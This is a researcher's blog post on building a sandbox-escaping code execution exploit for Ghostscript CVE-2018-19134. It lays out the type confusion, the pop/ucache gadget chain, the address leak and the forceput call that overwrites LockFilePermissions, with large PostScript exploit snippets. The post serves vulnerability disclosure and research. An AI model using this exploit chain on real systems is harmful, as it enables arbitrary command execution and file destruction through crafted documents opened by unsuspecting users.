In this post I’ll show how to construct an arbitrary code execution exploit for CVE-2018-19134, a vulnerability caused by type confusion. I discovered CVE-2018-19134 (alongside 3 other CVEs in Ghostscript) back in November 2018. If you’d like to know more about how I used our CodeQL technology to perform variant analysis in order to find these vulnerabilities (and how you can do so yourself!), please have a look at my previous blog post.
The vulnerability
Let’s first briefly recap the vulnerability. Recall that PostScript objects are represented as the type ref_s
(or more commonly ref
, which is a typedef
of ref_s
).
struct ref_s {
struct tas_s tas;
union v {
ps_int intval;
...
uint64_t dummy;
} value;
};
This is a 16 byte structure in which tas_s
occupies the first 8 bytes, containing the type information as well as the size
for array
, string
, dictionary
, etc.:
struct tas_s {
ushort type_attrs;
ushort _pad;
uint32_t rsize;
};
The vulnerability I found is the result of a missing type check in the function zsetcolor
: the type of pPatInst
was not checked before interpreting it as a gs_pattern_instance_t
.
static int
zsetcolor(i_ctx_t * i_ctx_p)
{
...
if ((n_comps = cs_num_components(pcs)) < 0) {
n_comps = -n_comps;
if (r_has_type(op, t_dictionary)) {
ref *pImpl, pPatInst;
if ((code = dict_find_string(op, "Implementation", &pImpl)) < 0)
return code;
if (code > 0) {
code = array_get(imemory, pImpl, 0, &pPatInst); //<--- Reported by Tavis Ormandy
if (code < 0)
return code;
cc.pattern = r_ptr(&pPatInst, gs_pattern_instance_t); //<--- What's the type of &pPatInst?!
n_numeric_comps = ( pattern_instance_uses_base_space(cc.pattern) ? n_comps - 1 : 0);
Here, r_ptr
is a macro in iref.h
:
#define r_ptr(rp,typ) ((typ *)((rp)->value.pstruct))
The value of pstruct
originates from PostScript, and is therefore controlled by the user. For example, the following input to setpattern
(which calls zsetcolor
under the hood) will result in pPatInst.value.pstruct
evaluating to 0x41
.
<< /Implementation [16#41] >> setpattern
Following the code into pattern_instance_uses_base_space
, I see that the object that I control is now the pointer pinst
, which the code interprets as a gs_pattern_instance_t
pointer:
pattern_instance_uses_base_space(const gs_pattern_instance_t * pinst)
{
return pinst->type->procs.uses_base_space(
pinst->type->procs.get_pattern(pinst) );
}
So it looks like I may be able to control a number of function pointers: get_pattern
, uses_base_space
, and pinst
.
Creating a fake object
Let’s see exactly how much of pinst
is under my control. The PostScript type array
is particularly useful here, as its value
stores a ref
pointer that points to the start of a ref
array. This allows me to create a buffer pointed to by value
, whose contents I can control:
In the above, a grey box indicates data that I have partial control of (I cannot control type_attrs
and pad
in tas
completely); green indicates the data that I have complete control of. The crucial point here is that, both value
in a ref
and type
in a gs_pattern_instance_t
have an offset of 8 bytes. This means that procs
in pinst->type->procs
will be the underlying PostScript array that is partially under my control. It turns out that I can indeed control both the function pointers get_pattern
and uses_base_space
by using nested arrays:
GS><</Implementation [[16#41 [16#51 16#52]]] >> setpattern
This sets pinst
to the array [16#41 [16#51 16#52]]
and results in:
This shows I indeed have full control over both uses_base_space
and get_pattern
. The next step: how do I use an arbitrary function pointer to achieve code execution?
8 bytes off an easy exploit
I decided to start with getting any valid function pointer. In Ghostscript, built-in PostScript operators are represented by the type t_operator
. As a ref
, its value
is an op_proc_t
, which is a function pointer. These can be reached by getting the operators off the systemdict
by their name:
GS>systemdict /put get ==
GS>--put--
So let’s try to put some built-in functions in our fake array:
/arr 100 array def
systemdict /put get arr exch 1 exch put
systemdict /get get arr exch 0 exch put
<</Implementation [[16#41 arr]] >> setpattern
I’ll be using the following PostScript instructions rather a lot: systemdict <foo> get <arr> exch <idx> exch put
. This fetches foo
from systemdict
and stores it in array arr
at index idx
. There may exist a better way of achieving that, but keep in mind that I’ve never written a line of PostScript before I found these vulnerabilities, so please bear with me.
Indeed, I can now call the zget
and zput
C functions directly, instead of uses_base_space
and get_pattern
:
So I can now call functions that I could already call from PostScript anyway, so what did I gain? The point here is that I also control the arguments to these functions, in C. When the underlying C function is called from PostScript, an execution context is passed to the C function as its argument. This context, represented by the type i_ctx_t
(alias of gs_context_state_s
— they do like their typedef
s!), contains a lot of information that cannot be controlled from PostScript, among which are important security settings such as LockFilePermissions
:
struct gs_context_state_s {
...
bool LockFilePermissions; /* accessed from userparams */
...
/* Put the stacks at the end to minimize other offsets. */
dict_stack_t dict_stack;
exec_stack_t exec_stack;
op_stack_t op_stack;
struct i_plugin_holder_s *plugin_list;
};
When calling operators from PostScript, the arguments passed to the operator are stored in op_stack
. By calling these functions from C directly and having control of the argument i_ctx_p
, we’ll be able to call functions as if Ghostscript is running without -dSAFER
mode switched on.
So let’s try to create a PostScript array to fake the context i_ctx_t
object. PostScript function arguments are stored in i_ctx_p->op_stack.stack.p
, which is a ref
pointer that points to the argument. In order to call PostScript functions with a fake context, I’ll need to control p
. The offset from p
to the i_ctx_p
here is actually the same as the offset of op_stack
, which is 0x270
. As each ref
is of size 0x10
, this corresponds to the 39th element in the fake reference array:
As seen from the diagram, this alignment is not ideal. The op_stack.stack.p
corresponds to the tas
part of my array, which I don’t control completely. If only op_stack
corresponded to a value
field of a ref
, then I would have succeeded. What’s more, tas
stores meta data of a ref
, so even if I have full control of it, I won’t be able to set it to the address of an arbitrary object without first knowing its address. As most PostScript functions dereference the operand pointer, any exploit will most likely just crash Ghostscript at this point. This looks like a show-stopper.
Getting arbitrary read and write primitives
The idea now is to find a PostScript function that:
- Does not dereference the
osp
(op_stack.stack.p
) pointer; - Still does something “useful” to
osp
; - Is available in
SAFER
mode.
Stack operators come to mind. The pop
operator is particularly interesting:
zpop(i_ctx_t *i_ctx_p)
{
os_ptr op = osp;
check_op(1);
pop(1);
return 0;
}
It checks the value of the stack pointer against the bottom of the stack with check_op
, which compares osp
against the pointer osbot
. If it is greater than osbot
, then decreases the value of osp
. It is a simple function that does not dereference osp
, and it changes its value. To see what I can gain from this, let’s take a closer look at the structure of ref
and op_stack
side by side:
Recall that in our fake object, op_stack
is faked by the 39th element of a ref
array, which is a ref
. As you can see in the image above, the field tas
corresponds to p
, while value
corresponds to osbot
. In particular, the three fields type_attrs
, _padd
and rsize
combined to form the the pointer p
in op_stack
. As explained before, type_attrs
specifies the type of the ref
object, as well as its accessibility. So by using pop
, I can modify both the type and accessibility of an object of my choice! One catch though: pop
only works if p
is larger than osbot
, which is the address of this ref
object. So in order for this to work, the object that I am tampering with needs to be a string
, array
or dictionary
that is large enough, so that rsize
, which gives the top bytes of p
, will combine with others to give something that is greater than the pointer address of most ref
objects. This prevents me from just modifying the accessibility of built-in read only objects like systemdict
to gain write access. Still, there are at least a couple of things that I can do:
-
I can “convert” an
array
into astring
this way, which will then treat the internalref
array as abyte
array (i.e. theref
pointer in thevalue
field of thisarray
is now treated as abyte
of the same length). This allows me to read/write the in-memory representation of any object that I put into the array. This is very powerful, as strings in PostScript are not terminated by a null character, but rather treated as abyte
buffer of length specified byrsize
, so any byte can be read/write from the byte buffer. Note that this does not give me any out-of-bound (OOB) read/write as the resultedstring
will have the same length as the original array, but since eachref
is of 16 bytes, the resulting byte buffer will only cover about 1/16 of the original allocated buffer for theref
array. This is what I’m going to do with the exploit. -
I can of course do it the other way round and “convert” a
string
into anarray
of the same length. As explained above, the resultingref
array will be about 16 times larger than the originalstring
array, which allows me to do OOB read and write. I have not pursued this route.
There is one more technical difficulty that I need to overcome. The fake object, pinst
actually calls two functions, with the output of one feeding into another:
return pinst->type->procs.uses_base_space(
pinst->type->procs.get_pattern(pinst) );
As seen from above, use_base_space
takes the return value of pinst->type->procs.get_pattern(pinst)
, which is now zpop(pinst)
as an input. As zpop
returns 0, this is likely to cause a null pointer dereference when I use any built-in PostScript operator in place of uses_base_space
, unless I can find an operator that doesn’t even use the context pointer i_ctx_p
at all.
If only there exists a query language I could use to find particular patterns in a codebase! Here’s the query I used to find the operator I was looking for:
from Function f
where
f.getName().matches("z%") and
f.getFile().getAbsolutePath().matches("%/psi/%") and
// Look for functions with a single parameter of the right type:
f.getNumberOfParameters() = 1 and f.getParameter(0).getType().hasName("i_ctx_t *") and
// Make sure the function is actually defined:
exists(Stmt stmt | stmt.getEnclosingFunction() = f) and
// And doesn't access `i_ctx_p`
not exists(FieldAccess fa, Function f2 |
fa.getQualifier().getType().hasName("i_ctx_t *") and
fa.getEnclosingFunction() = f2 and f.calls*(f2)
)
// And doesn't dereference `i_ctx_p`
and not exists(PointerDereferenceExpr expr, Variable v, Function f2 |
expr.getAnOperand() = v.getAnAccess() and
v.getType().hasName("i_ctx_t *") and
expr.getEnclosingFunction() = f2 and
f.calls*(f2)
)
select f
My query uses some heuristics to identify PostScript operators. Their names normally start with z
and are defined inside the psi
directory. Also they they take an argument of type i_ctx_t *
. I then look for functions that do not dereference the argument nor access its fields, either in itself or in functions that it calls. This query does not look for dereferences of the parameter i_ctx_p
particularly, but just any variable of type i_ctx_t *
, which is a good enough approximation.
You can run your own queries on over 130,000 GitHub,Bitbucket, and GitLab projects using CodeQL.
[EDIT]: You can also use our free CodeQL extension for Visual Studio Code. See installation instructions at https://securitylab.github.com/tools/codeql/.
Ghostscript is not developed on GitHub, Bitbucket, or GitLab. You can create a Ghostscript code snapshot as a database using the CodeQL CLI.
This query gives me 6 results:
The function ucache
seems to be just what we need. Let’s try to put this together and see if it works. First set up the fake object pinst
:
%Create the fake array pinst
/pinst 100 array def
%array that stores the pop-ucache gadget
/pop_ucache 100 array def
%put pop into pop_ucache to cause more type confusions by decrementing osp
systemdict /pop get pop_ucache exch 1 exch put
%put ucache in (no op) to avoid crash
systemdict /ucache get pop_ucache exch 0 exch put
%replace the functions with pop and ucache
pinst 1 pop_ucache put
Now we need to create a large array
object and store it in the 39th element of pinst
. It’s metadata tas
will then be interpreted as the stack pointer address osp
. I’ll use the PostScript operator put
as its first element, then use pop
to change its type to string
and read off the address of the zput
function.
%make a large enough array and change its type with pop
/arr 32767 array def
%get the address of the put operator
systemdict /put get arr exch 0 exch put
%store arr as 39th element of pinst and modify its type
pinst 39 arr put
%Create the argument to setpattern
/impl 100 dict def
impl /Implementation [pinst] put
%Change type of arr to string
0 1 1291 {impl setpattern} for
% Print the address of zput as string
pinst 39 get 8 8 getinterval
It is a bit unfortunate that the type_attrs
value for array
is 0x4
while the value for string
is 0x12
, so I have to underflow the ushort
to go from array
to string
, which is why I have to do impl setpattern
1291 times.
As can be seen in the screenshot above, the fake array gets converted into a string
and I get the address of zput
. I actually have to run it outside of gdb
or at least enable address randomization to get it work, as gdb
seem to always allocate arr
at 0x7ffff0a35078
, but with memory randomization, I’ve not failed a single time with the above. I can also use this to write bytes to any position in arr
.
Sandbox bypass
Now that I can read and write arbitrary bytes from an arbitrary PostScript object, it is just a matter of deciding what is the easiest thing to do. My original plan was to simply overwrite the LockFilePermissions
parameter, and then call file
, which would allow arbitrary command execution, like I did with CVE-2018-19475. However, it turns out that in order for this to work, I also need to fake a number of other objects in the execution context i_ctx_p
, which seems too complicated. Instead, I’m just going to call a simple but powerful function that I am not supposed to have access to in SAFER
mode, then use it to overwrite some security settings, which will then allow me to run arbitrary shell commands. The operator forceput
(also used by Tavis Ormandy in one of his Ghostscript vulnerabilities) fits the bill nicely.
Summarizing, here is what I need to do now:
- Create a fake operand stack with arguments that I want to supply to
forceput
; - Overwrite the location in
pinst
that stores the address of the operand stack pointer to the address of what I created above; - Get the address of
forceput
and replacepinst->type.procs.getpattern
with its address.
To achieve (1), recall that the operand stack is nothing more than an array of ref
. To fake it, I just need to create an array with my arguments:
/operand 3 array def
operand 0 userparams put
operand 1 /LockFilePermissions put
operand 2 false put
I can then store it in arr
to retrieve the address to this array. Instead of using arr
, I’m just going to reuse pinst
and put it in the 31st element instead:
pinst 31 operand 2 1 getinterval put
Note that instead of putting operand
into the 31st element of pinst
, I create a new array starting from operand[2]
and use that new array. This is because PostScript functions looks for their arguments by going down the operand stack, so I need to set it up so that when osp
decreases, it will get my other arguments.
Using the trick in the previous section, I can now read off the address of this fake stack pointer and write it to the appropriate location in pinst
. This then sets up pinst
for calling forceput
. Although forceput
is not accessible from SAFER
mode, I can simply take the address of zput
, and add its offset to zforceput
to obtain the address of zforceput
(as this offset is not randomized). In the debug binary compiled with commit 81f3d1e
, this offset is 0x437
and in the release binary compiled with the same commit, or in the release code of 9.25, this offset is 0x4B0
. After doing this, I can simply call a restore to write the new LockFilePermissions
parameter to the current device, and then run an arbitrary shell command (again, remember to turn address randomization ON). Here’s a screenshot of the launching of a calculator from sandboxed Ghostscript:
By overwriting other entries in userparams
, such as PermitFileReading
and PermitFileWriting
, it is also possible to gain arbitrary file access. Systems like AppArmor may be effective at preventing PDF viewers from starting arbitrary shell commands, but they don’t stop a specially-crafted PDF file from wiping a user’s entire home directory when opened. Or, if you’re in a more forgiving mood, you could delete all files from a user’s desktop and subsequently flood it with Super Mario bricks:
https://youtube.com/watch?v=5vVxN-vfCsI
Note: Post originally published on LGTM.com on February 05, 2019